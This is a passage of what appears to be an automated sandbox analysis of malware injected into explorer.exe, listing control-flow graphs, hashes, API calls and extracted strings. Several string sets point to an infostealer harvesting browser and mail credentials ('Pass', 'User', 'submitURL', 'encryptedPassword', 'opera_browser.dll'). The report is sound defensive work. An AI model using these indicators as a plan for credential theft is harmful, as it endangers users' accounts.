353 10b4f55e-10b4f561 350->353 357 10b4f538-10b4f559 352->357 358 10b4f509-10b4f532 call 10b4f942 352->358 354 10b4f616-10b4f619 353->354 355 10b4f567-10b4f572 353->355 360 10b4f61f-10b4f626 354->360 361 10b4f6b8-10b4f6bb 354->361 363 10b4f574-10b4f59d call 10b4f942 355->363 364 10b4f5a3-10b4f5a6 355->364 362 10b4f5e9-10b4f5fa 357->362 358->316 358->357 366 10b4f657-10b4f66b call 10b50e92 360->366 367 10b4f628-10b4f651 call 10b4f942 360->367 370 10b4f6bd-10b4f6c4 361->370 371 10b4f739-10b4f73c 361->371 362->349 363->316 363->364 364->316 369 10b4f5ac-10b4f5b6 364->369 366->316 388 10b4f671-10b4f6b3 366->388 367->316 367->366 369->316 377 10b4f5bc-10b4f5e6 369->377 378 10b4f6f5-10b4f734 370->378 379 10b4f6c6-10b4f6ef call 10b4f942 370->379 374 10b4f7c4-10b4f7c7 371->374 375 10b4f742-10b4f749 371->375 374->316 385 10b4f7cd-10b4f7d4 374->385 383 10b4f77a-10b4f7bf 375->383 384 10b4f74b-10b4f774 call 10b4f942 375->384 377->362 395 10b4f894-10b4f8a9 378->395 379->348 379->378 383->395 384->348 384->383 390 10b4f7d6-10b4f7f6 call 10b4f942 385->390 391 10b4f7fc-10b4f803 385->391 388->318 390->391 393 10b4f805-10b4f825 call 10b4f942 391->393 394 10b4f82b-10b4f835 391->394 393->394 394->348 400 10b4f837-10b4f83e 394->400 395->318 400->348 403 10b4f840-10b4f886 400->403 403->395
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID: `
                                                                                                                                                                  • API String ID: 823142352-2679148245
                                                                                                                                                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                  • Instruction ID: a73b79e5f8b499545d66fe4947d571cda2b142cd5be7406900d74300bc0e0a42
                                                                                                                                                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C225D70A18A0A9FCB49DF28C4997AAF7F1FB58300F61422EE45ED7250DB30E951DB85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 443 10b50e12-10b50e6e call 10b4f942 NtProtectVirtualMemory 446 10b50e70-10b50e7c 443->446 447 10b50e7d-10b50e8f 443->447
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 10B50E67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                  • Instruction ID: fa557270ae41de34d90b1eee2cb0f0c112c1b8283bfdb865175c805a04b3cb1c
                                                                                                                                                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                  • Instruction Fuzzy Hash: DD019E34628B884F8B88EF6C948522AB7E4FBD9214F000B3EA99AC3250EB60C5414742
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 448 10b50e0a-10b50e38 449 10b50e45-10b50e6e NtProtectVirtualMemory 448->449 450 10b50e40 call 10b4f942 448->450 451 10b50e70-10b50e7c 449->451 452 10b50e7d-10b50e8f 449->452 450->449
                                                                                                                                                                  APIs
                                                                                                                                                                  • NtProtectVirtualMemory.NTDLL ref: 10B50E67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                  • Instruction ID: 129ea740b78c2210d99f09af7bd5ec7c741429dddfa98cc668b2d47e5f87464d
                                                                                                                                                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F01A23462CB884B8B48EB2C94462A6B3E5FBCE314F000B7EE99AC3240DB61D5024782
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 10B4A9A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                  • Instruction ID: b447ee743b625d8059fb0b4330dd7995e308b36a25dcb551c8fadbcef4c4c69e
                                                                                                                                                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                  • Instruction Fuzzy Hash: E931E331614A4C8FCB45EFA8C8857EDB7E0FF58205F40026AE44ED7280DF749649C789
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • ObtainUserAgentString.URLMON ref: 10B4A9A0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AgentObtainStringUser
                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                  • API String ID: 2681117516-319646191
                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                  • Instruction ID: 8fd03b117e1ffbef9b2b374fd5cc5ce3833de7c2402f7006b4630ed5ff87ccc0
                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                  • Instruction Fuzzy Hash: CC212830614A4C8FCB05EFA8C8457ED7BF0FF58204F40026AE45AD7240DF749649C785
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                  • Instruction ID: d69812018deed66221b6487f17db092244dd65ce69308fb5b5b49d96050ef9f7
                                                                                                                                                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                  • Instruction Fuzzy Hash: 1F414A74918A08CFDB84EFA8C8D97AD77E0FB68300F1445BAD84EDB255DE309A45CB85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateMutex
                                                                                                                                                                  • String ID: .dll$el32$kern
                                                                                                                                                                  • API String ID: 1964310414-1222553051
                                                                                                                                                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                  • Instruction ID: 63c5a0dda15056f20286968b83ee4f306db5184f7b0ea004f4e6c1bc94a6cfcd
                                                                                                                                                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A411974918A088FDB84EFA8C4D97AD77E0FB68300F1445AAD84ADB255DA309A45CB85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 289 10b4c72e-10b4c768 290 10b4c788-10b4c7ab connect 289->290 291 10b4c76a-10b4c782 call 10b4f942 289->291 291->290
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: connect
                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                  • Instruction ID: 9c4aa6599072655da5ead00596ee7dad60698d42db79a442053ddae29288cf48
                                                                                                                                                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                  • Instruction Fuzzy Hash: 50014C30618B188FCB84EF1CE088B55B7E0EB58314F1545AAA90DCB226C674D9818BC2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 294 10b4c732-10b4c768 295 10b4c788-10b4c7ab connect 294->295 296 10b4c76a-10b4c782 call 10b4f942 294->296 296->295
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: connect
                                                                                                                                                                  • String ID: conn$ect
                                                                                                                                                                  • API String ID: 1959786783-716201944
                                                                                                                                                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                  • Instruction ID: 66c284d042f75b9b63d59e9be5b14ed9d40c01a40c7ca8084a909ed01ec1af3e
                                                                                                                                                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                  • Instruction Fuzzy Hash: D3012C70618A1C8FCB88EF5CE088B55B7E0FB59314F1541AEA90DCB226CB74CD818BC2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 407 10b4c6b2-10b4c6e5 408 10b4c705-10b4c72d send 407->408 409 10b4c6e7-10b4c6ff call 10b4f942 407->409 409->408
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: send
                                                                                                                                                                  • String ID: send
                                                                                                                                                                  • API String ID: 2809346765-2809346765
                                                                                                                                                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                  • Instruction ID: 8777f8ce1310f7cfae562529ec31a9459f7b5669893753a080415873f05ce211
                                                                                                                                                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 73011270518A1D8FDBC8DF1CD049B1577E0EB58314F1645AED85DCB266C670D9818B85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 412 10b4c5b2-10b4c5ea 413 10b4c5ec-10b4c604 call 10b4f942 412->413 414 10b4c60a-10b4c62b socket 412->414 413->414
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: socket
                                                                                                                                                                  • String ID: sock
                                                                                                                                                                  • API String ID: 98920635-2415254727
                                                                                                                                                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                  • Instruction ID: 9da489467300d01c1a61c58016c3bac484710ef300218ae10e427b0bea78e351
                                                                                                                                                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C01447061861C8FC784DF1CD048B54BBE0FB59354F1545ADE45EDB266C7B0C981CB86
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 417 10b442dd-10b44320 call 10b4f942 420 10b44326 417->420 421 10b443fa-10b4440e 417->421 422 10b44328-10b44339 SleepEx 420->422 422->422 423 10b4433b-10b44341 422->423 424 10b44343-10b44349 423->424 425 10b4434b-10b44352 423->425 424->425 426 10b4435c-10b4436a call 10b4ef12 424->426 427 10b44354-10b4435a 425->427 428 10b44370-10b44376 425->428 426->428 427->426 427->428 430 10b443b7-10b443bd 428->430 431 10b44378-10b4437e 428->431 433 10b443d4-10b443db 430->433 434 10b443bf-10b443cf call 10b44e72 430->434 431->430 432 10b44380-10b4438a 431->432 432->430 436 10b4438c-10b443b1 call 10b45432 432->436 433->422 438 10b443e1-10b443f5 call 10b440f2 433->438 434->433 436->430 438->422
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                  • Instruction ID: 8af858fe7abcbe5301c8a014df324ce15f672f6c50cc1e26b1f7a9274357c3d3
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                  • Instruction Fuzzy Hash: 12318B74604B49DFDB58DF698088295F3E0FB54301F6442BEC96ECB206CB78A660DF95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 453 10b44412-10b44446 call 10b4f942 456 10b44473-10b4447d 453->456 457 10b44448-10b44472 call 10b51c9e CreateThread 453->457
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3747983201.0000000010A70000.00000040.80000000.00040000.00000000.sdmp, Offset: 10A70000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_10a70000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                  • Instruction ID: afa4182df66a456f422d42ab1f1d0c7d13525a5e1c3b0303f0233b6daa2bd431
                                                                                                                                                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                  • Instruction Fuzzy Hash: C0F04630268A080FD788EF2CD44563AF3D0FBE8200F40067EA58EC3224CE39D5828706
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                  • API String ID: 0-393284711
                                                                                                                                                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                  • Instruction ID: dff08abf9e26a4e0a60014b0e6f2359fd5b17da2f465c5e3f5cc806bff8489e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                  • Instruction Fuzzy Hash: 32E15874618F488FCB65DF68C4887AAF7E0FB58305F804A2E959BC7241EF30A541CB85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                  • API String ID: 0-2916316912
                                                                                                                                                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                  • Instruction ID: 1ecf0b0037f7f5a2b7415ef7ea2970053933f0ccb8d0ffa36f24b5c276bd59a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                  • Instruction Fuzzy Hash: 67B16C30518B488EDB56DFA88489AEEF7F1FF98308F50451ED49AC7251EF70A5058B86
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                  • API String ID: 0-1539916866
                                                                                                                                                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                  • Instruction ID: 9caa077141bd972a934937d348366fe0a42c9c33e3dd815b73cb395c4cc657a3
                                                                                                                                                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                  • Instruction Fuzzy Hash: CC41AF70B18B188FDF14DF88A4496BDBBF2EB48705F00025ED409D3245DBB5A9458BD6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                  • API String ID: 0-355182820
                                                                                                                                                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                  • Instruction ID: 94c6f8b6105f4eec2da59bdf40844a42b85b05c4ef71405b5e348b440666619f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                  • Instruction Fuzzy Hash: 06C15B75218F098FC759EF68C489AEAF7E1FB98308F40462E959AC7210DF30B515CB86
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                  • API String ID: 0-97273177
                                                                                                                                                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                  • Instruction ID: 01a0d56bda24f16ae85f0cebd0e1b8dcf563ae1b96a49a7515246bf50b360e1c
                                                                                                                                                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                  • Instruction Fuzzy Hash: 6851E735519B488FD70ACF58D4852AAF7E5FBC5704F50192EE8CBC7242DBB4A506CB82
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                                  • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                  • Instruction ID: 3906eb243f031fef719f9237f4a3ce0bfcf7c44bbe9543e1e678a4d214dcfded
                                                                                                                                                                  • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                  • Instruction Fuzzy Hash: C6C18375619E1A4FCB49DF68D459AEAF3E1FF98308F814329944EC7250DF30A642C786
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                  • API String ID: 0-639201278
                                                                                                                                                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                  • Instruction ID: 7ea80613c1e12c1eb7b5fd79e0f46c4e10549e183a139ae94216c5f704fdea75
                                                                                                                                                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                                                                                                                                                  • Instruction Fuzzy Hash: 95C19375619E1A4FCB49DF68D499AEAF3E1FF98308F414329944EC7250DF30A642CB86
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000005.00000002.3748778056.0000000011160000.00000040.00000001.00040000.00000000.sdmp, Offset: 11160000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_5_2_11160000_explorer.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: UR$2$L: $Pass$User$name$word
                                                                                                                                                                  • API String ID: 0-2058692283
                                                                                                                                                                  • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                  • Instruction ID: 8f0205fb859e54ef2de3545da32faef1ff10904f46104307a3072c4e10489d71
                                                                                                                                                                  • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                                                                                                                                                  • Instruction Fuzzy Hash: FEA1AE70618B488FDB1ADFA894487EEBBE1FF98304F40462DD48AD7252EF709545C789
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
